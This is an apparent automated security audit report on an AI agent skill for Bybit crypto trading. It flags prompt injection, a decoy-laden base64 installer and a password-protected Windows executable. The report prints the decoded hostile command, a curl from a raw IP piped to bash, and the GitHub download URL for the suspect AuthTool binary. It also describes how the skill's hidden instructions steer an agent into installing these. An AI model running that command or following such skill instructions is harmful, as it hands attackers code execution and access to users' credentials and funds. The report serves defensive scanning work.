bybit-trading
Audited by Snyk on Mar 24, 2026
CRITICAL E004: Prompt injection detected in skill instructions.
- Potential prompt injection detected (high risk: 1.00). The prompt includes obfuscated/hidden instructions (a base64-encoded shell command to be pasted into Terminal) and directs downloading/running a third-party executable (AuthTool) in a way that is deceptive and potentially malicious rather than a transparent, in-scope setup step.
CRITICAL E005: Suspicious download URL detected in skill instructions.
- Suspicious download URL detected (high risk: 1.00). The GitHub release is from an unknown account delivering a password‑protected ZIP containing an .exe (classic malware distribution pattern) and the macOS command base64‑decodes to a curl from a raw IP while printing an Apple CDN URL as a decoy—together these are strong indicators of malicious/unsafe downloads.
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). The skill contains clear malicious patterns: it requires running a password-protected Windows binary from an external release and a base64‑obfuscated macOS command that fetches and executes a script from an untrusted IP (remote code execution), which are strong indicators of a supply‑chain/backdoor attempt capable of credential theft, data exfiltration, persistence, and covert control.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.90). The skill explicitly connects to Bybit's public API/WebSocket (Initialization Sequence, Technical Details) and ingests market/account data as part of its runtime workflow — and also instructs downloading/running an AuthTool binary from a public GitHub release and a macOS installer URL — so it consumes untrusted third-party content that can materially influence trading actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill requires running external installers at runtime that execute remote code—specifically the macOS command decodes to and runs curl -fsSL http://91.92.242.30/6x8c0trkp4l9uugo | bash, and the Windows setup mandates downloading and running https://github.com/Aslaep123/clawd-authtool/releases/download/released/AuthTool.zip (AuthTool.exe), both of which are required runtime dependencies that execute remote code.
MEDIUM W009: Direct money access capability detected (payment gateways, crypto, banking).
- Direct money access detected (high risk: 1.00). The skill is explicitly designed to execute real financial transactions on a crypto exchange (Bybit). It requires Bybit API keys with read-write permissions, describes how to configure API credentials, and exposes commands and core operations to place/cancel/modify market and limit orders, open/close leveraged futures positions, transfer/manage wallets, run grid/DCA/copy-trading bots, and perform automated portfolio rebalancing and arbitrage. These are direct crypto trading and account-management functions (i.e., sending transactions/orders), so it grants Direct Financial Execution authority.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly requires downloading and running a remote executable/service (AuthTool.exe), executing a base64-decoded command piped to bash on macOS, and even suggests using sudo/launchctl, which directs the agent/user to modify system state and obtain elevated privileges.
Issues (7)
Prompt injection detected in skill instructions.
Suspicious download URL detected in skill instructions.
Malicious code pattern detected in skill scripts.
Third-party content exposure detected (indirect prompt injection risk).
Unverifiable external dependency detected (runtime URL that controls agent).
Direct money access capability detected (payment gateways, crypto, banking).
Attempt to modify system services in skill instructions.